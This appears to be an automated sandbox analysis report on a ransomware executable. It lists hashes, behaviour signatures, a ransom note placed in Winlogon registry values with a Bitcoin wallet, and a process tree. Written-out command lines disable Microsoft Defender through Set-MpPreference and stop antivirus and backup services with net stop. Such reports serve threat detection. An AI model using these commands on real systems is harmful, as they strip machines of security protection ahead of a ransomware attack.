Analysis
max time kernel: 92s
max time network: 142s
platform: windows10_x64
resource: win10v200722
submitted: 03-09-2020 14:38
Static task: static1
Behavioral task: behavioral1
  Sample: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  Resource: win10v200722
General
Target: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size: 82KB
MD5: e01e11dca5e8b08fc8231b1cb6e2048c
SHA1: 4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512: 298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
Malware Config
Signatures
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 3 IoCs
Processes:
flow | pid  | process
28   | 4436 | mshta.exe
30   | 4436 | mshta.exe
32   | 4436 | mshta.exe
Executes dropped EXE 1 IoCs
Processes:
pid  | process
4404 | c3eokz5t.exe
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File created | C:\Users\Admin\Pictures\SplitMerge.tiff.crypted | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
File opened for modification | C:\Users\Admin\Pictures\SplitMerge.tiff | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Drops file in Windows directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat | svchost.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid  | process
5196 | vssadmin.exe
4828 | vssadmin.exe
4020 | vssadmin.exe
4416 | vssadmin.exe
5140 | vssadmin.exe
6028 | vssadmin.exe
3016 | vssadmin.exe
4356 | vssadmin.exe
4276 | vssadmin.exe
780  | vssadmin.exe
4904 | vssadmin.exe
5608 | vssadmin.exe
2108 | vssadmin.exe
5824 | vssadmin.exe
Kills process with taskkill 3 IoCs
Processes:
pid  | process
5296 | taskkill.exe
4872 | taskkill.exe
5036 | taskkill.exe
Modifies data under HKEY_USERS 6 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 5b04d4251082d601 | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 | svchost.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid  | process
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
1336 | powershell.exe
1336 | powershell.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
1336 | powershell.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid  | process
Token: SeShutdownPrivilege | 408 | svchost.exe
Token: SeCreatePagefilePrivilege | 408 | svchost.exe
Token: SeDebugPrivilege | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Token: SeDebugPrivilege | 1336 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1336 | powershell.exe
Token: SeSecurityPrivilege | 1336 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1336 | powershell.exe
Token: SeLoadDriverPrivilege | 1336 | powershell.exe
Token: SeSystemProfilePrivilege | 1336 | powershell.exe
Token: SeSystemtimePrivilege | 1336 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1336 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1336 | powershell.exe
Token: SeCreatePagefilePrivilege | 1336 | powershell.exe
Token: SeBackupPrivilege | 1336 | powershell.exe
Token: SeRestorePrivilege | 1336 | powershell.exe
Token: SeShutdownPrivilege | 1336 | powershell.exe
Token: SeDebugPrivilege | 1336 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1336 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1336 | powershell.exe
Token: SeUndockPrivilege | 1336 | powershell.exe
Token: SeManageVolumePrivilege | 1336 | powershell.exe
Token: 33 | 1336 | powershell.exe
Token: 34 | 1336 | powershell.exe
Token: 35 | 1336 | powershell.exe
Token: 36 | 1336 | powershell.exe
Token: SeDebugPrivilege | 2784 | powershell.exe
Token: SeDebugPrivilege | 3016 | powershell.exe
Token: SeDebugPrivilege | 3708 | powershell.exe
Token: SeDebugPrivilege | 3520 | powershell.exe
Token: SeDebugPrivilege | 2304 | powershell.exe
Token: SeDebugPrivilege | 1800 | powershell.exe
Token: SeDebugPrivilege | 3596 | powershell.exe
Token: SeDebugPrivilege | 1716 | powershell.exe
Token: SeDebugPrivilege | 1720 | powershell.exe
Token: SeDebugPrivilege | 4140 | powershell.exe
Token: SeDebugPrivilege | 4252 | powershell.exe
Token: SeDebugPrivilege | 4352 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3016 | powershell.exe
Token: SeSecurityPrivilege | 3016 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3016 | powershell.exe
Token: SeLoadDriverPrivilege | 3016 | powershell.exe
Token: SeSystemProfilePrivilege | 3016 | powershell.exe
Token: SeSystemtimePrivilege | 3016 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3016 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3016 | powershell.exe
Token: SeCreatePagefilePrivilege | 3016 | powershell.exe
Token: SeBackupPrivilege | 3016 | powershell.exe
Token: SeRestorePrivilege | 3016 | powershell.exe
Token: SeShutdownPrivilege | 3016 | powershell.exe
Token: SeDebugPrivilege | 3016 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3016 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3016 | powershell.exe
Token: SeUndockPrivilege | 3016 | powershell.exe
Token: SeManageVolumePrivilege | 3016 | powershell.exe
Token: 33 | 3016 | powershell.exe
Token: 34 | 3016 | powershell.exe
Token: 35 | 3016 | powershell.exe
Token: 36 | 3016 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2784 | powershell.exe
Token: SeSecurityPrivilege | 2784 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2784 | powershell.exe
Token: SeLoadDriverPrivilege | 2784 | powershell.exe
Token: SeSystemProfilePrivilege | 2784 | powershell.exe
Token: SeSystemtimePrivilege | 2784 | powershell.exe
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid  | process
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid  | process
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid  | process | target process
PID 3888 wrote to memory of 1336 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1336 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 2784 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 2784 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3016 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3016 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3708 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3708 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 2304 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 2304 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3520 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3520 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1800 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1800 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3596 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 3596 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1716 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1716 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1720 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 1720 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4140 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4140 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4252 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4252 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4352 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4352 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | powershell.exe
PID 3888 wrote to memory of 4464 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4464 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4484 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4484 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4512 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4512 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4584 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4584 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4632 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4632 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4660 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4660 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4740 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4740 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4800 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4800 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4836 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4836 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4872 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4872 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4948 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4948 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 4464 wrote to memory of 4968 | 4464 | net.exe | net1.exe
PID 4464 wrote to memory of 4968 | 4464 | net.exe | net1.exe
PID 4484 wrote to memory of 5008 | 4484 | net.exe | net1.exe
PID 4484 wrote to memory of 5008 | 4484 | net.exe | net1.exe
PID 3888 wrote to memory of 5036 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 5036 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 2372 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 2372 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 4512 wrote to memory of 4148 | 4512 | net.exe | net1.exe
PID 4512 wrote to memory of 4148 | 4512 | net.exe | net1.exe
PID 3888 wrote to memory of 4276 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 3888 wrote to memory of 4276 | 3888 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe | net.exe
PID 4584 wrote to memory of 3648 | 4584 | net.exe | net1.exe
PID 4584 wrote to memory of 3648 | 4584 | net.exe | net1.exe
PID 4632 wrote to memory of 4492 | 4632 | net.exe | net1.exe
PID 4632 wrote to memory of 4492 | 4632 | net.exe | net1.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe (PID 3888)
  Command line: "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
  Signatures: Modifies extensions of user files; Drops startup file; Modifies WinLogon; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1336)
    Command line: "powershell" Get-MpPreference -verbose
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2784)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3016)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3708)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2304)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3520)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1800)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3596)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1716)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1720)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4140)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4252)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4352)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\net.exe (PID 4464)
    Command line: "net.exe" stop avpsus /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4968)
      Command line: C:\Windows\system32\net1 stop avpsus /y
  - C:\Windows\SYSTEM32\net.exe (PID 4484)
    Command line: "net.exe" stop McAfeeDLPAgentService /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 5008)
      Command line: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  - C:\Windows\SYSTEM32\net.exe (PID 4512)
    Command line: "net.exe" stop mfewc /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4148)
      Command line: C:\Windows\system32\net1 stop mfewc /y
  - C:\Windows\SYSTEM32\net.exe (PID 4584)
    Command line: "net.exe" stop BMR Boot Service /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3648)
